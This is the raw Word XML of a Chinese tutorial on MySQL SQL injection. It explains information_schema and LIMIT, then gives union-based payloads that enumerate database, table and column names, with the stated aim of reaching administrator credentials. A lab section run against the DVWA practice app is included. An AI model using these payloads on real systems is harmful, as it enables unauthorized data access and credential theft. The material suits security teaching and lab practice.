        <w:t>5.0以上有了系统表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22690286" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="005700B1" w:rsidRDefault="006472F7" w:rsidP="006472F7">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3.3.1</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00935F9C" w:rsidRPr="005700B1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>information_schema结构包含数据库关键信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31929244" w14:textId="77777777" w:rsidR="00AA5C43" w:rsidRPr="00CD76A0" w:rsidRDefault="00AA5C4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MySQL 5和之前的版本有很多不同的地方，其中最显著的特点就是，MySQL 5比之前增加了系统数据库information_schema结构，用于存储数据库系统信息，因此可以利用这个库爆出想要的表名和列名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F020E65" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00581BDE" w:rsidRDefault="00AA5C43" w:rsidP="00581BDE">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MySQL 5数据库中的information_schema结构如下。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="00585037" w14:paraId="516FD153" w14:textId="77777777" w:rsidTr="00585037">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CEF34C5" w14:textId="77777777" w:rsidR="00585037" w:rsidRPr="00585037" w:rsidRDefault="00585037" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00585037">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>TABLES_IN_INFORMATION_SCHEMA</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FC861FA" w14:textId="77777777" w:rsidR="00585037" w:rsidRPr="00585037" w:rsidRDefault="00585037" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00585037">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>CHARACTER_SETS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="356389C4" w14:textId="77777777" w:rsidR="00585037" w:rsidRPr="00585037" w:rsidRDefault="00585037" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00585037">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>COLLATIONS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46A8E4CB" w14:textId="77777777" w:rsidR="00585037" w:rsidRPr="00585037" w:rsidRDefault="00585037" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00585037">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>CONLLATION_CHARACTE_SET_APPLICABILITY</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="585E0940" w14:textId="77777777" w:rsidR="00585037" w:rsidRPr="00585037" w:rsidRDefault="00585037" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00585037">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>COLUMNS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A95BD5C" w14:textId="77777777" w:rsidR="00585037" w:rsidRPr="00585037" w:rsidRDefault="00585037" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00585037">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>COLUMN_PRIVILEGES</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D8E357B" w14:textId="77777777" w:rsidR="00585037" w:rsidRPr="00585037" w:rsidRDefault="00585037" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00585037">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>KEY_COLUMN_USAGE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63A69F53" w14:textId="77777777" w:rsidR="00585037" w:rsidRPr="00585037" w:rsidRDefault="00585037" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00585037">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>ROUTINES</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A3B25B9" w14:textId="77777777" w:rsidR="00585037" w:rsidRPr="00585037" w:rsidRDefault="00585037" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00585037">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>SCHEMATA</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A22D345" w14:textId="77777777" w:rsidR="00585037" w:rsidRPr="00585037" w:rsidRDefault="00585037" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00585037">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>SCHEMA_PRIVILEGES</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="450FC639" w14:textId="77777777" w:rsidR="00585037" w:rsidRPr="00585037" w:rsidRDefault="00585037" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00585037">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>STATISTICS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09344F7A" w14:textId="77777777" w:rsidR="00585037" w:rsidRPr="00585037" w:rsidRDefault="00585037" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00585037">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>TABLES</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36D9BBD6" w14:textId="77777777" w:rsidR="00585037" w:rsidRPr="00585037" w:rsidRDefault="00585037" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00585037">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>TABLE_CONSTRAINTS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A07C347" w14:textId="77777777" w:rsidR="00585037" w:rsidRPr="00585037" w:rsidRDefault="00585037" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00585037">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>TABLE_PRIVILEGES</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76DB6005" w14:textId="77777777" w:rsidR="00585037" w:rsidRPr="00585037" w:rsidRDefault="00585037" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00585037">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>TRIGGERS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58FF88DD" w14:textId="77777777" w:rsidR="00585037" w:rsidRPr="00585037" w:rsidRDefault="00585037" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00585037">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>USER_PRIVILEGES</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E327999" w14:textId="77777777" w:rsidR="00585037" w:rsidRDefault="00585037" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00585037">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>VIEWS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49BE48D3" w14:textId="77777777" w:rsidR="00865774" w:rsidRPr="00CD76A0" w:rsidRDefault="00865774"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在MySQL 5数据库的注入检测中，常用到以下几个表</w:t>
      </w:r>
      <w:r w:rsidR="00581BDE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FCA12B" w14:textId="77777777" w:rsidR="00865774" w:rsidRPr="00CD76A0" w:rsidRDefault="0086577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SCHEMATA”表，用于存储数据库名。其中的关键字段为SCHEMA_NAME，表示数据库名称。“’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBFB248" w14:textId="77777777" w:rsidR="00865774" w:rsidRPr="00CD76A0" w:rsidRDefault="0086577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TABLES”表，用于存储表名。其中的关键字段TABLE_SCHEMA表示表所属的数据库名称;关键字段TABLE_NAME表示表的名称.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E274ED2" w14:textId="77777777" w:rsidR="00865774" w:rsidRPr="00276D91" w:rsidRDefault="00865774" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="250" w:firstLine="525"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00276D91">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"COLUMNS”表，用于存储字段名.其中的关键字段TABLE SCHEMA表示表所属的数据库名称;字段TABLE NAME表示所属的表的名称;COLUMN_NAME表示字段名.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35079FE3" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="0086577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可以看到，在MySQL 5数据库注入过程中，只要通过注射点构造语句查询相关字段，就可以得到任意想要的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008D99E4" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="005700B1" w:rsidRDefault="006472F7" w:rsidP="006472F7">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3.3.2</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00937AEC" w:rsidRPr="005700B1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LIMIT子句查询指定数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53556BCF" w14:textId="77777777" w:rsidR="00E179C5" w:rsidRPr="00CD76A0" w:rsidRDefault="00E179C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查询information_schema结构中的数据内容时，常常需要返回前几条或中间指定的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>某几条数据，MySQL中提供了一个LIMIT子句查询，可实现此功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F15D5F2" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="00E179C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LIMIT子句可以被用于强制SELECT语句返回指定的记录数。LIMIT的用法如下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BD5983" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="002F001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 FROM table LIMIT [iffset,] rows | rows OFFSET offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221FE410" w14:textId="77777777" w:rsidR="005C5D9C" w:rsidRPr="00CD76A0" w:rsidRDefault="00A15E1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LIMIT接受一个或两个数字参数，参数必须是一个整数常量。如果给定两个参数，第一个参数指定第一个返回记录行的偏移量，第二个参数指定返回记录行的最大数目。需要注意的是，初</w:t>
      </w:r>
      <w:r w:rsidR="005C5D9C" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>始记录行的偏移量是0而不是1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7CFBC0" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="005C5D9C"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例如，执行如下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D2C899" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="00BA3C9A"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 FROM table LIMIT 0,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6652E0" w14:textId="77777777" w:rsidR="002A2F94" w:rsidRPr="00CD76A0" w:rsidRDefault="002A2F9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句可检索记录行中的第一条数据内容。执行如下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2686252E" w14:textId="77777777" w:rsidR="002A2F94" w:rsidRPr="00CD76A0" w:rsidRDefault="002A2F9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 FROM table LIMIT 1,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034D2C55" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="002A2F9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则可检索记录行中的第二条数据内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AA6B75" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="005700B1" w:rsidRDefault="006472F7" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.3.3</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A40071" w:rsidRPr="005700B1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LIMIT爆库、爆表与爆字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE93249" w14:textId="77777777" w:rsidR="00A7335B" w:rsidRPr="00CD76A0" w:rsidRDefault="00A7335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利用MySQL中的LIMIT子句查询功能，可以轻易地爆出数据库库名与表和字段内容，实</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733AEFA3" w14:textId="77777777" w:rsidR="00A7335B" w:rsidRPr="00CD76A0" w:rsidRDefault="00A7335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现SQL注入攻击。下面是常用的LIMIT注入攻击查询语句:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3708273E" w14:textId="77777777" w:rsidR="00490292" w:rsidRPr="00276D91" w:rsidRDefault="00490292" w:rsidP="00200887">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1.爆数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED64612"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and 1=2 union select 1,database()/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4B047F"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句可爆出当前数据库名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F83B74"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and 1=2 union select 1,SCHEMA_NAME from information_schema.SCHEMATA limit 0,1/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0D9745"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增加黑体数字0，可查询爆出所有的数据库名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537132DE" w14:textId="77777777" w:rsidR="00490292" w:rsidRPr="00276D91" w:rsidRDefault="00490292" w:rsidP="00200887">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t>2.爆表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B951C8" w14:textId="77777777" w:rsidR="00FD356B"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and 1=2 union select 1,2</w:t>
      </w:r>
      <w:r w:rsidR="00FD356B" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,3,TABLE_NAME,4,5,6,7......from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3883250C"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information_schema.TABLES where TABLE_SCHEMA=库名十六进制代码 limit 0,1/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A310A77" w14:textId="77777777" w:rsidR="00490292"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增加黑体数字0，可查询爆出指定数据库中的所有表名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666B272F" w14:textId="77777777" w:rsidR="007D362F" w:rsidRDefault="00490292" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00276D91">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.爆字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CB1981" w14:textId="77777777" w:rsidR="002C6FBC" w:rsidRPr="00CD76A0" w:rsidRDefault="002C6FBC"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and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7......from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059E4521" w14:textId="77777777" w:rsidR="002C6FBC" w:rsidRPr="00CD76A0" w:rsidRDefault="002C6FBC"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information_schema.TABLES where TABLE_NAME=表名十六进制代码 limit 0,1/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CEBF9B" w14:textId="77777777" w:rsidR="0080366B"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增加黑体数字0，可查询爆出指定表中的所有字段名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D997520" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="0049029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管理员账号与密码字段，就可以方便地查询到其中的内容了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132F21F9" w14:textId="77777777" w:rsidR="00C97653" w:rsidRPr="00C97653" w:rsidRDefault="00C97653" w:rsidP="00604925">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97653">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>mysql攻击测试（二）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1236FCAA" w14:textId="77777777" w:rsidR="005636A5" w:rsidRDefault="00C24966" w:rsidP="00697914">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="005636A5" w:rsidRPr="006F73A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00132D99">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>查看当前数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6287C9DE" w14:textId="77777777" w:rsidR="00673EAC" w:rsidRDefault="00673EAC" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55799916" wp14:editId="34F2CC11">
            <wp:extent cx="5274310" cy="358767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5274310" cy="3587674"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5827C3" w14:textId="77777777" w:rsidR="00C24966" w:rsidRPr="00200887" w:rsidRDefault="006E141E"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返回当前数据库名</w:t>
      </w:r>
      <w:r w:rsidR="009C7176" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dvwa"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FA1CB5" w14:textId="77777777" w:rsidR="00C24966" w:rsidRDefault="00C24966" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24966">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="002C3A84">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>、爆出当前据库中所有数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242C46CA" w14:textId="77777777" w:rsidR="00C24966" w:rsidRPr="00CD76A0" w:rsidRDefault="00C2496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当前数据库名后.再继续查询所有的数据库名.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A47099" w14:textId="77777777" w:rsidR="00C24966" w:rsidRPr="00CD76A0" w:rsidRDefault="00C2496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schema_name%20from%20information_schema.schemata%20limit%20</w:t>
      </w:r>
      <w:r w:rsidR="00C8039E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
